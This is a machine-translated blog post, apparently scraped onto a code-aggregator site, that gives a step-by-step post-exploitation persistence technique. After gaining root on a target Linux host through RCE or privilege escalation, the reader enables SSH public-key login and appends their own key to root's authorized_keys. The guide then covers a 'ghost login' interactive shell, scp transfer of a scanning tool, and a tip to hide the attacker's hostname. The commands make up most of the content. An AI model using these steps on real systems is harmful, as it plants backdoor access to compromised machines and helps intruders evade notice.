Passwordless Linux hosts connect directly using public keys

News 2023-07-28 22:12:32 views: null

0x00 premise

  • Old things from the past, take out the water article
  • Generally, through Rce, privilege escalation, etc., get the root privilege of the target linux
  • The main reason is that there is no password, the hash cannot be run out, and the machine cannot go out of the network normally
  • you can try the forward link

0x01 First target host, modify target Ssh service configuration

Enable ssh certificate login and restart the SSH service

echo RSAAuthentication yes >> /etc/ssh/sshd_config
echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
systemctl restart sshd

0x02 Generate key on local linux

# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa

Note: This step is best to go to a pure Linux build, because this key will expose your hostname

image-20211012225853932

//找见id_rsa.pub自行拷贝出来
ls -al /root/.ssh/
cp /root/.ssh/id_rsa.pub /home/xxxx/Desktop/
//赋于权限
chmod 777 /home/xxxx/Desktop/id_rsa.pub

There are two files in the /root/.ssh/folder:

id_rsa(私钥)
id_rsa.pub(公钥)

0x03 The linux target machine writes the public key

  1. Upload the public key to the intranet linux by yourself, and save it in the /root/.ssh/ directory, change the file name to authorized_keys, or use echo to append the command execution

  2. If the authorized_keys file already exists in the target, just add it to the end

  3. Note: "Backup" the original authorized_keys before operation again, in case of emergency.

# echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8Zrks74SYQ4JzKFvYPyL2tG+Scx/y/gIDk5znJF6XKjJ2MFS7RfsjKqpRk7bb+bDpgb5awiMzMOUgwBDheJKerji9/FD+jHEI133ejCZphiPL0+OItLdl7uUt+NFMMPNeXh9lmDOwApxVg54xhDjyzWYaV6xQgvWuZK+6qNBD1TW2/zXImeHpC+L37KQSgFvtxyOiYw/Uq/Caoa9VkcFsUsJ1ftmKSh7unkEJiJAHpzmI0SquNdrgTJ5AiVclQbTa8viyl+irXYjUyvxWKCqBhMhuQQFEMRdViVStgSRoVREEH361J7T7oCC0rJE2XV8MlejXZGi7if34gYHYgyBKvEQ9/Ff+fkQV5LXdZLkC0h3wOBLV9lWwMamlFSjJMTSBlZP1syHYV/X1YNO76SmLUUi48PwDQa52g0tI2TusDmjgARWxwhCndu463dwbCcGjfHnSEAWEB2WGJcKOcpfGLUrdDt9My/d26dfMTNdlaw+kdnDVlYvk0qnyBBZhyfE= [email protected] >> /root/.ssh/authorized_keys

0x04 ghost login

ssh -T [email protected] /usr/bin/bash -i

image-20211013142036434

0x05 Use Scp to transfer files without password

scp -P 22 -r /root/fsacn [email protected]:/usr/tmp/fsacn

Guess you like

Origin blog.csdn.net/god_zzZ/article/details/120751772
Recommended
Apache Doris version 2.0.10 is officially released!
Open Source Daily | Big models go to war; big model unicorns are revealed to be selling themselves; Zhou Hongyi suggests that Google open source all its products; the largest open source AI community provides $10 million to share GPUs
Ranking
JS inheritance and monitoring
[ProblemSolving][Ubuntu][LyX] The selected document class ... requires external files that are not available...
Java threads sharing static variable
balancap/SSD-Tensorflow使用及训练预测自己的数据集
Detailed core ES6
JS --- reverse traversal achieved Array array, the array is connected string
How to Uninstall (or Reinstall) Windows 10’s Ubuntu Bash Shell
Linux modify the hostname method
Charging Specification BC v1.2
node的性能和java对比分析
Daily
More
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)

Code World

© 2018 codetd.com